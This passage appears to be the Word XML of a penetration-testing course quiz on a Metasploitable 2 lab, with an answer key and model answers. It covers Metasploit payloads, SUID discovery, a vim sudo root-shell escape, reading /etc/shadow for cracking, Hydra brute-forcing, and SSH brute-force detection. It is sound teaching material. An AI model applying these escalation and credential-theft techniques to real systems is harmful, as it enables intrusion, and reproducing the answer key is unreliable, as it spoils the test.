    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Phishing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hydra is best described as a tool for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Offline hash cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Online brute-force against live login services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Memory forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Packet capture analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer Key</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975"/>
        <w:gridCol w:w="975"/>
        <w:gridCol w:w="7796"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Q#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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The payload is the code (e.g. Meterpreter, a shell) that executes once the exploit succeeds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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LHOST is the attacker's local host that the reverse payload calls back to.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Staged payloads send a tiny stager first, downloading the full payload afterward, reducing the initial data sent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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-perm -4000 matches the SUID bit, listing binaries that run with their owner's (often root) privileges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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vim's shell-escape feature, combined with sudo privileges, directly yields a root shell — a classic GTFOBins technique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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/etc/shadow contains the actual password hashes and is restricted to root, unlike the world-readable /etc/passwd.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Unquoted service paths let Windows try shorter intermediate paths first, which an attacker can hijack.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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MD5's speed is a liability for password hashing — it lets attackers try enormous numbers of guesses per second.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Salting makes identical passwords hash differently per account, defeating precomputed table attacks and forcing per-account cracking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Hydra attacks live services (SSH, HTTP forms, etc.) directly over the network, unlike John/Hashcat which crack offline hash files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-Answer Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The vsftpd 2.3.4 backdoor on Metasploitable 2 was introduced maliciously into the source code. What does this tell us about supply chain security?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">It demonstrates that trusting a vendor's name is not enough — the official distribution archive itself was compromised for a period, meaning anyone who downloaded it got a backdoor without any flaw in the original developers' code. This is why verifying checksums/signatures and monitoring the integrity of software distribution channels is as important as auditing source code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Your Meterpreter shell runs as the daemon user. Why is it important to escalate to root before post-exploitation?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Many valuable post-exploitation actions — reading /etc/shadow, dumping credential hashes, installing durable persistence, accessing other users' data — require root privileges. Remaining as a low-privilege user like daemon severely limits what can be demonstrated or recovered, so escalation is normally the immediate next step after an initial foothold.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the /etc/shadow file, and why does reading it represent a significant post-exploitation win?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/shadow stores password hashes and ageing data for local accounts, readable only by root. Successfully reading it both proves full root access was achieved and provides every local account's hash for offline cracking, which can expose reused passwords across other systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why does adding a salt to a password hash dramatically increase cracking time, even with the same dictionary?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Without a salt, identical passwords produce identical hashes, so one precomputed table can crack every account that shares a password. A salt makes each hash unique even for identical passwords, forcing the attacker to run the entire dictionary separately against each individual hash rather than reusing one table across the whole database.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> From a defender's perspective, what detection rule would alert on an SSH brute-force attack?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A rule counting failed SSH authentication events per source IP within a short time window (for example, more than 20 failed logins from one IP in 5 minutes) and generating an alert — in Splunk this could be a saved search such as counting 'Failed password' events grouped by source IP, triggering when the count exceeds a threshold.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-Answer / Descriptive Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
